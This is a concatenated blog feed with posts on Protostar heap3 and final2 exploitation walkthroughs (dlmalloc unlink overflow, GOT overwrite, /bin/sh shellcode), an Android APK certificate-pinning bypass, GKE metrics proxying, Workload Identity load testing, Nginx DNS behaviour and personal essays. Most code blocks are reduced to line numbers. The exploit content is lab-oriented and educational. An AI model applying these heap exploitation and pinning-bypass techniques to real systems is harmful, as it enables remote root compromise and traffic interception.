bit of the third chunk must be 0. 0xfffffffc 0xfffffffc
will work.
Once we fool dlmalloc into thinking the second chunk is already freed, dlmalloc will unlink()
it.
So we need to craft values for the second chunk’s forwards and backwards pointers such that
unlink()
will redirect code execution to another region of memory where we can insert shellcode.
In the Heap3 level we overwrote the address of a function in the procedure linkage table (PLT) with
the address of shellcode. We can do the same here. Since we send two packets, dll
will be 2. The
for-loop will call write()
twice. The first free()
will overwrite write()
’s address in the
PLT. Let’s find the PLT address containing the address of write()
. We disassemble get_requests
,
examine the address 0x8048dfc
as an instruction to get the address in the global offset table
(GOT) that points to the dynamically linked library containing the actual write()0
function. We
want to overwrite the contents of 0x804d41c
with the address of our shellcode. Since unlink()
adds 12 to the forwards pointer, we need to make the forward pointer 0x804d41c - 12
.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Where should we put our shellcode? We can include it in our first request. The first two DWORDs will
be clobbered by dlmalloc when it sets the first chunk’s forwards and backwards pointers. The first
word needs to be used for FSRD
anyways. So let’s put shellcode at 0x804e010
. This address will
be our backwards pointer.
To summarize, this is how the packets should look so far.
The first payload must start with FSRD
. Then we need four bytes of filler bytes AAAA
followed by
shellcode (TBD). The last byte must be /
for memmove()
. The payload must be 128 bytes. The
spaces in the payload visualization below are just for readability. They shouldn’t be in the actual
payload.
1
|
|
The second payload must start with FSRDROOT
. Then have 0xfffffffc 0xfffffffc
. Then the forward
pointer 0x804d41c - 12
and backward pointer 0x804e010
. The whole payload must again be 128
bytes. We can just fill with A
s.
1
|
|
Before we craft shellcode, let’s confirm the exploit will redirect code execution to the proposed
shellcode address. Instead of using actual shellcode, we’ll use four bytes of 0xcc
which is a
one-byte x86 instruction called INT3
that causes the processor to halt the process for any
attached debuggers. If we hit this opcode, our attached gdb debugger receive the SIGTRAP
signal.
Let’s test with the below Python script.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
|
Attach gdb to the final2
process again.
1 2 3 4 5 6 7 8 9 10 11 |
|
Set a breakpoint at the call to write()
.
1 2 3 4 |
|
Run the Python script in another terminal. Hit enter to send a third packet that’s less than 128
bytes to break out of the while(1)
loop.
1 2 3 |
|
The gdb session should hit the breakpoint at write()
.
1 2 3 4 5 6 7 8 |
|
Examine the first 80 DWORDs. Continue and examine again.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
|
Memory at 0x804e008
and 0x804e00c
have been changed (to addresses before the heap. I guess
because it’s some special value for the first chunk). Our INT3 instruction is at 0x804e010
. Let’s
look at the GOT entry for write()
.
1 2 3 4 5 |
|
Its value is the location of our INT3. This means the next call to write()
will redirect code
execution to our INT3 which should cause gdb to break again.
1 2 3 4 5 |
|
It worked!
So now all we have to is insert some real shellcode that’ll own the system. Since final2 is running
as root
, let’s make the process start a shell. This will allow us send arbitrary commands over TCP
that get executed as root, i.e. remote code execution. Shellstorm has a great library of
shellcodes. Let’s use “Linux/x86 - execve(/bin/sh) - 28 bytes”. But we have a
problem. unlink()
overwrites the memory at 0x804e018
(it’ll always overwrite four bytes of
memory eight bytes ahead of whatever address we pick), and no useful shellcode is short enough to
fit into eight bytes. What can we do?
If the shellcode could only jump past 0x804e018
to 0x804e01c
where we have a huge piece of
contiguous memory. Luckily the jmp
instruction (\xeb
) does exactly this. Its argument is how many
bytes to jump over. So our shellcode can start with 0xeb 0x0a
which moves the instruction pointer
10 bytes forward. We fill in the middle 10 bytes with nop
s (0x90
). Our final script will
be this.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
|
1 2 3 4 5 |
|
The basic principle is to proxy the traffic from the app through a computer you control on which you can capture and analyze traffic. If the app you’re interested in is using an unencrypted protocol like HTTP, this is pretty easy. Just run a proxy on your computer and configure your mobile device to proxy network traffic through your computer’s IP.
Most apps these days, however, use encrypted protocols like HTTPS (or are even required to by default by mobile OSes). Data at the TCP layer and below like IP addresses and port numbers are visible in plaintext, but all application level data at the HTTPS layer is encrypted. So you run a proxy that supports HTTPS on your computer, but then your app doesn’t trust the self-signed TLS certificate your computer presents. Mobile apps used to trust certificates that the mobile device’s system trusted. So you could just download the self-signed certificate onto the mobile device and configure the mobile OS to trust it. But these days mobile app frameworks let developers customize their app’s network security settings (like so for Android).
Let’s say your mobile app has custom trust anchors or pins certificates. What do you do now? You can either
I’m not familiar with how to do this on iOS (there seem to be good resources out there like this) so will show how to do option two on Android.
I don’t have an Android so used an emulator called Genymotion. I created a Samsung Galaxy S9 virtual device which is has a recent enough Android OS to run most mobile apps. In order to install the mobile app from the Google Play Store I had to install OpenGApps. I think I’m also able to download the APK from the web and drag and drop it into the emulator to install.
To install the Charles cert, I had to open this page in Chrome. The built-in browser in the emulator didn’t seem to prompt me to download the Charles cert, but Chrome did. I installed Chrome by install OpenGApps and then installing Chrome from the Play store. I think I also needed to configure the Android device to use Charles as its proxy with these steps in order to get the certificate download prompt. Then I made the Android device trust it.
I used `apktool to decompile the APK.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
The app only allows cleartext to the above two domains. I don’t see any pinned certificates, but
there must be some defaults since the app didn’t trust the same certs trusted by the Android OS. So
I updated network_security_config.xml
to be the following.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Then I tried recompiling the patched APK but got the following error.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
|
This Github issue comment suggested I run that command with the --use-aapt2
switch.
Then I got another error.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
|
This PR fixes the above on Linux and Windows. As of this writing, it’s not released yet. So I had to build from source on an Ubuntu VM.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
I signed the patched APK. First I generated some keys. I’m not sure if certain signing and key algorithms are required, but these are the ones I used.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
|
Then when dragging and dropping the patched APK into the virtual device, I got an error saying the
app couldn’t be installed. In these cases, generating the logs and grepping through them for errors
like INSTALL_PARSE_FAILED_NO_CERTIFICATES
and INSTALL_FAILED_VERIFICATION_FAILURE
helps. I fixed
this last error by disabling USB verification in the virtual device
settings. The setting for this is inside the virtual Android device itself under “developer
settings.”
I made sure the traffic was proxied through my computer, the patched app started successfully, and I was able to see unencrypted data in Charles!
Many other resources already explain the exploit well, but I’m writing my own explanation to reinforce my understanding and to celebrate.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
|
The source code is pretty straightforward. There’s the main()
and winner()
functions. There’s
three character pointers, three malloc()
’s, three strcpy()
’s, three free()
’s, and finally a
printf()
. Our goal is to redirect code execution from main()
to winner()
.
The description at the top of the level is
This level introduces the Doug Lea Malloc (dlmalloc) and how heap meta data can be modified to change program execution.
All these exercises are on 32-bit x86 architecture.
The vulnerable malloc is usually referred to as dlmalloc (named after one of its authors Doug Lea) and must be an old version like this one from 1996. The Phrack article “Once Upon a free()…” provides useful background.
Most malloc implementations share the behaviour of storing their own management information, such as lists of used or free blocks, sizes of memory blocks and other useful data within the heap space itself.
The central attack of exploiting malloc allocated buffer overflows is to modify this management information in a way that will allow arbitrary memory overwrites afterwards.
For our purposes, skip to the “GNU C Library implementation” section. It says that memory slices or
“chunks” created by malloc are organized like so. On 32-bit systems, prev_size
and size
are
4 bytes each. data
is the user data section. malloc()
returns a pointer to the address where
data
starts.
1 2 3 4 5 6 7 8 9 10 |
|
The other important things to know about the vulnerable version(s) of dlmalloc are:
size
called PREV_INUSE
indicates whether the previous chunk is used or notfree()
the chunk using free(mem)
, the memory is released, and if
its neighboring chunks aren’t free, dlmalloc will clear the next chunk’s PREV_INUSE
and add the
chunk to a doubly-linked list of other free chunks. It does this by adding a forward and backward
pointer at mem
.1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
unlink()
which removes an entry from a doubly-linked list and ties the
loose ends of the list back together.1 2 3 4 5 6 7 |
|
Written with pointer notation:
1 2 3 4 |
|
Since we can overwrite the bytes of P, we can overwrite 4-bytes of memory at two arbitrary places. To trigger this code path, chunks being consolidated must be bigger than 80 bytes. dlmalloc classifies these chunks as “fastbins.”
An array of lists holding recently freed small chunks. Fastbins are not doubly linked.
Run gdb on heap3.c
. My personal preference is to set the disassembly-flavor to intel and turn off
pagination.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
We first disassemble the main()
function.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
|
The printf has become a puts()
. plt
stands for procedure linkage table, one of the structures
which makes dynamic loading and linking easier to use. @plt
means we are calling puts
at PLT
entry at address 0x8048790
. If we disassemble that address we see
1 2 3 4 5 6 |
|
It calls another function at address 0x804b128
. This address is part of the Global Offset Table
(GOT) which points to the dynamically linked library containing the actual puts()
function.
1 2 |
|
We want to replace the call to puts()
with a call to winner()
. So we want to overwrite the
contents of 0x804b128
in the GOT, currently 0x08048796
, with the address to winner()
.
To get a visual sense of what the heap looks like, set breakpoints at every library function
call, i.e. break at the address of malloc()
, strcpy()
, free()
, and puts()
.
1 2 3 4 5 6 7 8 |
|
Run the program with some recognizable input strings.
1 2 3 4 5 6 |
|
We’ve hit the first breakpoint. Continue past it so that one malloc()
is called and the heap is
initialized.
1 2 3 4 5 |
|
Now look at the mapped memory regions.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
|
The heap starts at 0x804c000
, ends at 0x804d000
, and has size 0x1000
or 4096 bytes. We can
define hooks in gdb. We define one to examine the first 56 words of the heap in hexadecimal every
time execution stops.
1 2 3 4 5 |
|
If we continue, we hit the third malloc. At this point two malloc()
’s have been called.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
The second word of the chunk up to the last three bits indicates the chunk size in bytes. 0x29
is
0b101001
. Without the last three bits it’s 0b101000
which is 40. We can see the chunk starts at
0x804c000
and ends at 0x804c028
which is the start of the next chunk. This range encompasses
10 words. Each word is 4 bytes which makes 10 * 4 = 40 bytes. The last bit of the size word
indicates that the previous chunk is in use. By convention the first chunk has this bit turned on
because there’s no previous chunk that’s free.
The second chunk resulting from the second malloc()
starts at 0x804c028
and ends at 0x804c050
.
It’s identical to the first chunk. Continue past the third malloc()
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
We see a third chunk is created. The number at the end (right now 0x00000f89
) indicates the
remaining size of the heap. It has been decreasing. Continue past the first strcpy()
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
We see the the 12 A
’s (ASCII value 41) have been written to the heap. Continue two more times past
the remaining two strcpy()
’s.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
|
We see the 12 B
’s and C
’s being written to their respective chunks. We are now at the first
free()
. Continue again.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
The first word of the third chunk’s data at 0x804c058
has been zeroed out. Continue.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
0x804c030
now has 0x0804c050
which is a pointer to the start of the third chunk. This shows the
second and third chunk are now tied together in a singly-linked list since they are small enough to
be considered fastbins. Continue.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
Now the first chunk has been freed and address 0x804c008
has a pointer 0x0804c028
to the second
chunk. If we continue, the program runs the printf("dynamite failed?\n");
line.
1 2 3 4 5 6 7 |
|
Let’s work backwards. We can use unlink()
to write the four byte address of a call to winner()
to the GOT
entry for puts()
. Use objdump
to find the address of winner()
.
1 2 |
|
We can’t just put 0x08048864
in the GOT entry at 0x804b128
(why?).
In order to call winner()
, we’ll need to craft a payload that does so. Such a
payload is often called “shellcode.” The following assembly code will do.
1 2 |
|
Using an online x86 assembler, the above in raw assembly is
\xB8\x64\x88\x04\x08\xFF\xD0
. We can store this in the heap’s first chunk whose data area starts
at 0x804c008
. Now we want to write 0x804c008
into the GOT entry for puts()
at 0x804b128
.
Let’s go back to the unlink statements.
1 2 3 4 |
|
BK
is the address of \xB8\x64\x88\x04\x08\xFF\xD0
. Where should we store that? Let’s put it in
the first chunk at 0x804c014
. The first chunk’s data starts at 0x804c008
, but we’ve seen the
first byte is changed by dlmalloc when it’s freed. We don’t want our shellcode to be changed so we
put it at a safe distance in the data at a +12-byte offset. 12 A
’s can pad the shellcode enough to
push it 12-bytes into the heap. We have enough info to construct the first command line argument.
1
|
|
We’ll store FD
and BK
in the third chunk. We can use the second command line argument to
overwrite the size of the third chunk to be greater than 80 to trigger the unlink()
macro when the
third chunk is free()
’d. The second argument needs to have enough characters to overflow its
chunk. The chunk’s data starts at 0x804c030
and ends 32 bytes later at 0x804c050
. The third
chunk’s size
is four bytes later at 0x804c054
. So we can use 32 + 4 = 36 characters as padding.
Let’s pick 100 as the size of the third chunk. 100 = 0x64. We also have to set the last bit to 1 to
indicate the second or previous chunk is in use. So the third chunk’s size should be 0x65
. So our
second argument can have 36 B
’s as padding followed by \x65
.
1
|
|
Now we craft the third and final argument. The structure for it will be some padding + some four
bytes to be determined + some size + FD
+ BK
.
The third chunk starts at 0x804c050
. It used to end 40 bytes later at 0x804c078
, but we
overwrote its size to 0x65
or 100. So now it ends 100 bytes later at 0x804c0b4
. We want to
trigger unlink()
on the third chunk when we free()
it. We’ve already ensured it’s not a fastbin
by setting its size to be greater than 80 bytes. The next condition is to make dlmalloc consolidate
this chunk with either the chunk before or after. Since we’re using the previous chunk, let’s fool
dlmalloc into thinking the next chunk is free.
I know what you’re thinking. There’s no fourth chunk. That’s right, but we’ll make dlmalloc think
there is. In order to check a chunk is free, dlmalloc looks at the PREV_INUSE
bit of the next
chunk. To find the next chunk, dlmalloc adds the size of the current chunk to the current chunk’s
address. You can see this at line 3259.
1
|
|
inuse_bit_at_offset()
is a macro defined at line 1410.
1 2 |
|
chunk_at_offset()
is defined at line 1381.
1
|
|
So let’s write a small size at 0x804c0b8
to make dlmalloc think the fifth chunk is close by and so
we don’t have to add too much padding to our third argument. A size like 0x20
. We’ll have to write
it as \x00\x00\x00\x20
. But we have a problem here. C treats \x00
as the end of a string, and
thus strcpy()
will stop copying any string up to and including that NUL
. We won’t be able to add
any more bytes after that. This means we cannot insert \x00
in the middle of any of our inputs.
But all is not lost. We want a small number for the fourth chunk’s size. What’s another way of summing to a small number, at least in the way computers represent integers? In non-modular arithmetic, the only way two integers can produce a small sum is if they themselves are smaller. In modular arithmetic, a small integer can be the sum of large numbers that are greater than the modulus.
Take a closer look at how chunk_at_offset()
is defined. It sums two numbers with no sanity checks.
So we can write a really big number with no null bytes that strcpy()
won’t stop on and will make
dlmalloc think the next fifth chunk is close by. Even better, we can use the first byte of the
fourth chunk as the fifth chunk’s size. How can we make dlmalloc think the fifth chunk is four bytes
ahead of the fourth chunk? We do this with 0xfffffffc
which is -2 in two’s complement for signed
integers. So 0xfffffffc
at 0x804c0b8
will point to a fifth chunk’s size four bytes earlier at
0x804c0b4
. This word’s last bit must be set to 0 to indicate the fourth chunk is free. We can
simply use 0xfffffffc
again here.
We want (FD + 12)
to equal 0x804b128
. So FD should be 0x804b128
- 12 = 0x804b11c
. In the above
we decided to make BK
0x0804c014
. We have
1
|
|
92 C
’s of padding, two 0xfffffffc
words, FD
, followed by BK
.
With the same gdb session as above, run the program with the three arguments.
1 2 3 4 5 6 7 8 9 |
|
Let’s continue until we stop at the first free()
call.
1 2 3 4 5 6 |
|
Examine the GOT entry for puts()
.
1 2 |
|
Continue and see that free(c)
has overwritten the contents to the address of our shellcode!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
Let the rest of the program run to see winner()
is called.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 |
|
Now let’s run it without gdb.
1 2 3 |
|
Amazing.
Gke-metadata-server runs as a K8s DaemonSet. It exposes metrics about itself in Prometheus
text-based format. I want to have an external scraper make HTTP requests to periodically collect
these metrics. Unfortunately, the Prometheus HTTP server only listens on the Container’s localhost
interface. So how can we expose these metrics, i.e. make the HTTP endpoint available externally?
socat
is awesome.Notice the DaemonSet is configured with .spec.template.spec.hostNetwork: true
below. This means
the HTTP server is also listening on the GKE node’s localhost
interface.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 |
|
We can run a separate workload on this cluster that uses socat
to proxy HTTP requests to
gke-metadata-server. socat
stands for socket cat and is a multipurpose relay. It’s netcat
on
steroids and can relay any kind of packets not just TCP and UDP.
This proxy is deployed as a DaemonSet to make it easy to have a one-to-one
correspondence with each node-local gke-metadata-server Pod. The DaemonSet will also need to have
.spec.template.spec.hostNetwork: true
so that it can share the same network namespace.
Here’s the proxy DaemonSet YAML. I use the Docker image alpine/socat:1.7.3.4-r0
which is a
tiny 3.61MB. The arguments ["TCP-LISTEN:54899,reuseaddr,fork", "TCP:127.0.0.1:54898"]
tell socat
to forward traffic from 0.0.0.0:54899
to 127.0.0.1:54898
which is where the Prometheus metrics
are. fork
tells socat to
After establishing a connection, handles its channel in a child process and keeps the parent process attempting to produce more connections, either by listening or by connecting in a loop
— http://www.dest-unreach.org/socat/doc/socat.html#OPTION_FORK
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
|
Apply the DaemonSet.
1
|
|
Now make an HTTP request to any GKE node IP at port 54899.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
|
Voila. The important metrics are:
metadata_server_request_count
metadata_server_request_durations_bucket
I have these Prometheus recording rules to calculate RPS and request duration percentiles.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 |
|
Thanks to @mikedanese for the intial idea of using socat
.
Before we knew about this low RPS failure threshold, we told many internal engineering teams to go ahead and use the feature. In hindsight, we should’ve load-tested the feature before making it generally available internally especially since it wasn’t even GA publicly.
My efforts to load test WI have grown more sophisticated over time. This post describes the progression. It’s like the “4 Levels of …” Epicurious Youtube videos. The goal here is to find out at what RPS WI starts to fail and to try to learn some generalizable lessons from load testing vendor-managed services.
Workloads on GKE often need to access GCP resources like PubSub or CloudSQL. In order to do so, your workload needs to use a Google Service Account (GSA) key that is authorized to access those resources. So you end up creating keys for all your GSA’s and copy-pasting these keys into Kubernetes Secrets for your workloads. This is insecure and not maintainable if you are a company that has dozens of engineering teams and hundreds of workloads.
So GCP offered WI which allows a Kubernetes Service Account (KSA) to be associated with a GSA. If a workload can run with a certain KSA, it’ll transparently get the Google access token for the associated GSA. No manual copy-pasting GSA keys!
How does this work? You have to enable WI on your cluster and node pool. This creates a
gke-metadata-server
DaemonSet in the kube-system
namespace. gke-metadata-server
is the
entrypoint to the whole WI system. Here’s a nice Google Cloud Next conference talk with more
details.
gke-metadata-server
is the only part of WI that is exposed to GKE users, i.e. runs on machines you
control. It’s like the Verizon FiOS box in your basement. You control your house, but there’s a
little box that Verizon owns and operates in there. All other parts of WI run on GCP infrastructure
that you can’t see. When I saw failures with WI, it all seemed to happen in
gke-metadata-server
. So that’s what I’ll load test.
Here’s the gke-metadata-server
DaemonSet YAML for reference. As of the time of this writing the
image is gke.gcr.io/gke-metadata-server:20200218_1145_RC0
. You might see different behavior with
different images.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 |
|
What kind of load am I putting on gke-metadata-server
? Since this DaemonSet exists to give out
Google access tokens, I’ll send it HTTP requests asking for such tokens.
I built a Docker image with the following Dockerfile
.
1 2 |
|
Then I created the following K8s Deployment YAML.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
I ran seven of these Pods on a single node (see the nodeSelector
above) to target a single
instance of gke-metadata-server
.
This isn’t a great test because there’s a lot of extra work performed by the Container in running
gcloud
to print a Google access token (there may be bottlenecks in this gcloud
command itself
which is Python code), curling the googleapis.com
endpoint to get the token info (originally done
to verify the token was valid). And there’s probably bottlenecks in using a shell to do this. All in
all, this implementation doesn’t really let you specify a fixed RPS. You’re at the mercy of how fast
your Container, shell, gcloud, and the network will let you execute this. I also wasn’t able to run
more Pods on a single node because I was hitting the max 32 pods per node limit. There were already
a bunch of other GKE-system level workloads like Calico that took up node capacity.
Apply this one Pod
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
|
Then kubectl exec
in and run this command.
1
|
|
Everything seemed to work fine when N was 100. When N was 200 I got a few errors like the below. They look like client-side errors and not server ones though.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
|
gcloud
does not synchronize between processes with concurrent invokations. It sometimes writes
files to disk. So this is also not a great load test because it still doesn’t let you achieve a
specific RPS and has client-side bottlenecks.
Use a proper HTTP load testing tool. A colleague told me about vegeta
.
It’s a seemingly good tool, but, more importantly, its commands are amazing.
vegeta attack ...
.
I first start a golang
Pod that just busy-waits.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
|
Then I get a shell in it.
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Let’s throw some load on WI! my-gsa@my-project.iam.gserviceaccount.com
is the GSA associated with
the KSA your workload runs as.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 |
|
After more bisection, I found that this specific instance of gke-metadata-server
starts to fail around 150RPS. When it does fail, p99 latency skyrockets from less than 1 second to
30 seconds. This is usually a sign of a rate limiter or quota.
How have you tried load testing WI or other GKE features? What’re your favorite load testing tools for these cases, and what interesting behavior have you found?
]]>“How Spotify Accidentally Deleted All its Kube Clusters with No User Impact”
“Spotify, with David Xia”. Listen on Spotify here.
I moved a backend service foo
from running on a virtual machine to K8s. Foo’s clients include an
Nginx instance running outside K8s configured with this upstream
block.
1 2 3 4 5 6 7 8 9 10 11 12 |
|
K8s Pods can be rescheduled anytime so their IPs aren’t stable. I’m supposed to use K8s Services
to avoid caching these ephemeral Pod IPs. But in my case because of interoperability reasons I was
registering Pod IPs directly as A records for foo.example.com.
. I started noticing that after my Pod
IPs changed either because of rescheduling or updating the Deployment, Nginx started throwing
502 Bad Gateway
errors.
Nginx resolves statically configured domain names only once at startup or configuration
reload time. So Nginx resolved foo.example.com.
once at startup to several Pod IPs and cached
them forever.
Using a variable for the domain name will make Nginx resolve and cache it using the TTL value of the
DNS response. So replace the upstream
block with a variable. I have no idea why it has to be a
variable to make Nginx resolve the domain periodically.
1
|
|
And replace the proxy_pass
line with
1 2 3 4 |
|
This behavior isn’t documented but has been observed empirically and discussed here, here,
and here. I also learned that this setup requires me to define a resolver
in the Nginx configs.
For some reason Nginx resolves statically configured domains by querying the nameserver specified in
/etc/resolv.conf
but periodically resolved domains require a completely different config
setting. I would love to know why.
The VM on which Nginx was running ran a Bind DNS server locally, so I set resolver 127.0.0.1
.
I triggered the code path that made Nginx send requests to foo and saw periodic DNS queries
occurring with sudo tcpdump -i lo -n dst port 53 | grep foo
.
I had another Nginx instance that also made requests to foo. This Nginx was running on K8s too. It was created with this Deployment YAML.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
|
The nginx-config
ConfigMap was
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
I replaced upstream
with the same pattern above, but in this case when I needed to define
resolver
I couldn’t use 127.0.0.1
because there’s no Bind running locally. I can’t hardcode the
resolver because it might change.
If Nginx and foo run on the same K8s cluster, I can use the cluster-local DNS record created by a K8s Service matching the foo Pods. A Service like this
1 2 3 4 5 6 |
|
will create a DNS A record foo.bar.svc.cluster.local.
pointing to the K8s Service’s IP.
Since this Service’s IP is stable and it load balances requests to the underlying Pods, there’s no need for Nginx to
periodically lookup the Pod IPs. I can keep the upstream
block like so.
1 2 3 |
|
As its name implies, foo.bar.svc.cluster.local.
is only resolvable within the cluster. So
Nginx has to be running on the same cluster as foo.
resolver
equal to the system’s when the Pod startsDisclaimer: This “solution” is more of an ugly, brittle hack that should only be used as a last resort.
What if Nginx is on another K8s cluster? Then I can set resolver
to the IP of one of the
nameservers in /etc/resolv.conf
. After a bunch of tinkering I came up with this way to dynamically
set the Nginx resolver
when the Pod starts. A placeholder for resolver
is set in the Nginx
ConfigMap, and a command at Pod startup copies over the templated config and replaces the
placeholder with a nameserver IP from /etc/resolv.conf
.
Change nginx-config
ConfigMap to
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
Deployment YAML then becomes (note the added command
, args
, and new volume
and volumeMount
).
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
|
A volume
of type emptyDir
is needed because recent versions of K8s made configMap volumes
read-only. EmptyDir types are writable.
Hopefully this helps some people out there who don’t want to spend as much time as I did Googling obscure Nginx behavior.
]]>Recently, I’ve been trying to refactor an internal Spotify deployment tool my
team built and maintains. This deployment tool takes Kubernetes (k8s) YAML
manifests, changes them, and essentially runs kubectl apply
. We add metadata
to the k8s manifests like labels.
Right now this tool receives the input YAML as strings, converts them to Jackson ObjectNodes, and manipulates those ObjectNodes. The disadvantage of this is that there’s no k8s type-safety. We might accidentally add a field to a Deployment that isn’t valid or remove something from a Service that’s required.
My refactor uses upstream k8s model classes from kubernetes-client/java which are themselves generated from the official Swagger spec. Here’s a helpful Yaml utility class that deserializes YAML strings into concrete classes and can also serialize them back into YAML strings. So helpful.
Unfortunately, there’s some bugs in the YAML (de)serialization that prevent me from finishing this effort.
Nonetheless, it’ll be much nicer to change k8s resources in a type-safe way instead of parsing and rewriting raw YAML strings.
]]>Who else deserves to be on this list?
So I, often being ignorant of their fame, have casually interacted with them or criticized their milk steaming techniques when they’re using the office’s $20K espresso machine.
Only later am I told by their posse, “Did you know that was Mark Ronson/Bebe Rhexa/Max Martin/etc?”
“It’s OK,” I say. “Now Max knows how to make a real latte.”
]]>I’ve come to cherish this little tradition more and more. I need to plan my next trip to Boston!
]]>Chang and Eng were two conjoined twins born in Vietnam in the 1800s. The term “Siamese twins” is based on them.
The brothers were joined at the sternum by a small piece of cartilage, and though their livers were fused, they were independently complete.
After a Scotsman noticed them and paraded them around as a freak show attraction for ten years, the Bunker twins settled down in Wilkesboro, North Carolina. They married two local white women who were sisters. They became naturalized American citizens and even owned slaves.
The Bunkers and their wives slept in a bed built for four. After a while their wives started to not get along. So they alternated between two different houses. Chang had twelve children while Eng had ten. Today their descendents number more than 1,500 and hold reunions. Their liver is on display in at the Mütter Museum in Philadelphia, Pennsylvania.
Rose Wilder Lane was the eldest child of Laura Ingalls Wilder, the ostensible author of the Little House book series. Lane was by all means a boss ass bitch who lived a full life.
Sick of crop failures and tough frontier life, Lane moved in 1908 to San Francisco, California. She married a salesman named Gillette Lane and became pregnant. Sadly, her son was stillborn, and a subsequent surgery left her unable to have kids.
She felt her intellectual interests did not mesh with the life she was living with her husband. Keenly aware of her lack of a formal education, during these years, Lane read voraciously and taught herself several languages. Her writing career began around 1908, with occasional freelance newspaper jobs that earned much-needed extra cash.
Lane’s writing career took off. She wrote for publications like Harper’s and Saturday Evening Post.
In the late 1920s, Lane was reputed to be one of the highest-paid female writers in America, and along with Hoover, she counted among her friends well known figures such as Sinclair Lewis, Isabel Paterson, Dorothy Thompson, John Patric, and Lowell Thomas.
